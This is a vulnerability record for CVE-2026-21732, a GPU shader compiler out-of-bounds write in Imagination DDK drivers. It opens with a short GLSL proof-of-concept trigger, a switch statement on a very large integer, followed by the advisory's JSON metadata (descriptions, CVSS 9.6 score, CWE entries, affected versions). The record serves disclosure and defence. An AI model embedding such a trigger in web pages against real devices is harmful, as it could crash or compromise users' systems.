CVE-2026-21732

// PoC for CVE-2026-21732: GPU Shader Compiler Out-of-Bounds Write // This GLSL snippet demonstrates the trigger condition #version 450 layout(location = 0) out vec4 fragColor; void main() { // Using a very large integer value in a switch statement int trigger_value = 2147483647; switch (trigger_value) { case 1: fragColor = vec4(1.0, 0.0, 0.0, 1.0); break; // The compiler may mishandle the jump table generation // for values far outside the case range, leading to OOB write. default: fragColor = vec4(0.0, 0.0, 1.0, 1.0); break; } }

{"cve": {"id": "CVE-2026-21732", "sourceIdentifier": "367425dc-4d06-4041-9650-c2dc6aaa27ce", "published": "2026-03-20T23:16:42.480", "lastModified": "2026-04-21T16:55:05.810", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A web page that contains unusual GPU shader code is loaded into the GPU compiler process and can trigger a write out-of-bounds write crash in the GPU shader compiler library. On certain platforms, when the compiler process has system privileges this could enable further exploits on the device.\n\n\n\nAn edge case using a very large value in switch statements in GPU shader code can cause a segmentation fault in the GPU shader compiler due to an out-of-bounds write access."}, {"lang": "es", "value": "Una página web que contiene código de sombreador de GPU inusual se carga en el proceso del compilador de GPU y puede desencadenar un fallo por escritura fuera de límites en la biblioteca del compilador de sombreadores de GPU. En ciertas plataformas, cuando el proceso del compilador tiene privilegios de sistema, esto podría permitir explotaciones adicionales en el dispositivo.\n\nUn caso límite que utiliza un valor muy grande en sentencias switch en el código de sombreador de GPU puede causar un fallo de segmentación en el compilador de sombreadores de GPU debido a un acceso de escritura fuera de límites."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "367425dc-4d06-4041-9650-c2dc6aaa27ce", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-823"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:imaginationtech:ddk:*:*:*:*:*:*:*:*", "versionStartIncluding": "24.1", "versionEndIncluding": "25.1", "matchCriteriaId": "A62602A5-EBBC-4F29-9D12-311AD0626512"}, {"vulnerable": true, "criteria": "cpe:2.3:a:imaginationtech:ddk:1.17:*:*:*:*:*:*:*", "matchCriteriaId": "1C2A0AE6-35B7-4221-8E49-6CF3AD9B3927"}, {"vulnerable": true, "criteria": "cpe:2.3:a:imaginationtech:ddk:1.18:*:*:*:*:*:*:*", "matchCriteriaId": "822E865A-168C-4F82-95C7-B1752575C175"}, {"vulnerable": true, "criteria": "cpe:2.3:a:imaginationtech:ddk:23.2:*:*:*:*:*:*:*", "matchCriteriaId": "6F512C3D-CF11-492B-8CAB-CF51965F4250"}]}]}], "references": [{"url": "https://www.imaginationtech.com/gpu-driver-vulnerabilities/", "source": "367425dc-4d06-4041-9650-c2dc6aaa27ce", "tags": ["Vendor Advisory"]}]}}